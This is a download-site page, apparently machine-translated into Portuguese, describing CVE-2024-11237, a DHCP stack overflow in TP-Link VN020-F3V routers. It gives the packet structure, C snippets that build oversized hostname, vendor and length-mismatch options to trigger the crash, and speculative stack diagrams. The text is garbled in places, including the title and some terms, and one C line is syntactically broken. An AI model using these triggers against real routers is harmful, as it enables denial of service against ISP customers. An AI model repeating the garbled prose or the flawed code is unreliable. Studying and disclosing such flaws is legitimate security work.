Download TP Thumper - TP Thumper Código do código

TP Thumper

Outro código-fonte

Baixar

TP-LINK VN020 DHCP MEMAIS COLURAÇÃO (CVE-2024-11237)

Vulnerabilidade crítica no processamento de pacotes DHCP

Visão geral

Uma vulnerabilidade crítica foi descoberta no TP-Link VN020 F3V (T) roteadores de firmware de execução da versão TT_V6.2.1021. A vulnerabilidade permite que os atacantes remotos acionem um tampão baseado em pilha por meio de pacotes DHCP especialmente criados, levando às condições de negação de serviço (DOS).

Dispositivos afetados:

Modelo do roteador: TP-Link VN020-F3V (T)
Versão do firmware: tt_v6.2.1021
Implantação: principalmente através de ISPs Tunisie Telecom e Topnet
Variantes confirmadas: também afeta versões argelinas e marroquinas

NOTA IMPORTANTE: Devido à natureza proprietária do firmware, os detalhes exatos da implementação interna são desconhecidos. Esta análise é baseada no comportamento observado e no teste de caixa preta.

Detalhes da vulnerabilidade

CVE ID : CVE-2024-11237
Tipo : Overflow Buffer baseado em pilha (CWE-121)
Vetor de ataque : remoto (pacote DHCP Discover)
Autenticação : nenhum necessário
Porta : UDP/67 (servidor DHCP)
Impacto : DOS (confirmado) e RCE (possível)
Complexidade : Baixo

Análise técnica

Estrutura do pacote DHCP

 [Basic DHCP Header]
0x00: 01        ; BOOTREQUEST
0x01: 01        ; Hardware type (Ethernet)
0x02: 06        ; Hardware address length
0x03: 00        ; Hops
0x04-0x07: XID  ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC  ; Client hardware address
0x29-0x2C: 0000 ; Padding

Vetores de exploração

DHCP HostName Processing

 // Overflow trigger through hostname option
unsigned char long_hostname [ 128 ];
memset ( long_hostname , 'A' , sizeof ( long_hostname ) - 1 );
long_hostname [ 127 ] = '' ;
add_option ( packet , offset , 0x0C , 127 , long_hostname );

Opção específica do fornecedor

 // Vendor option manipulation
unsigned char vendor_specific [] = { 
    0x00 , 0x14 , 0x22 ,  // TP-Link vendor prefix
    0xFF , 0xFF , 0xFF   // Trigger condition
};
add_option ( packet , offset , 0x2B , sizeof ( vendor_specific ), vendor_specific );

Manipulação de campo de comprimento

 // Claimed vs actual length mismatch
add_option ( packet , offset , 0x3D , 0xFF , ( unsigned char []) { 0x01 });

Corrupção potencial de memória

Embora a implementação interna exata seja desconhecida, o comportamento observado sugere problemas potenciais de corrupção de memória:

Processamento normal do nome do host DHCP

 Stack Layout (Normal Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Return Address (4)   |
+------------------------+
|    Saved EBP (4)       |
+------------------------+
|                        |
|   Hostname Buffer      |
|      (64 bytes)        |
|                        |
+------------------------+ Lower addresses
|    Other Variables     |
+------------------------+

O que poderia estar acontecendo dentro do roteador?

 Stack Layout (Overflow Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Overwritten Return   | 
+------------------------+
|   Overwritten EBP      | <- Unknown state corruption
+------------------------+
|     Overflow Data      | <- 127 bytes of 'A'
|         ...            |
+------------------------+ Lower addresses
|    Other Variables     | <- Potentially corrupted
+------------------------+

Isso é teórico, e certos detalhes podem não ser totalmente precisos, pois o TP-Link fornece o firmware para esse roteador exclusivamente para ISPs.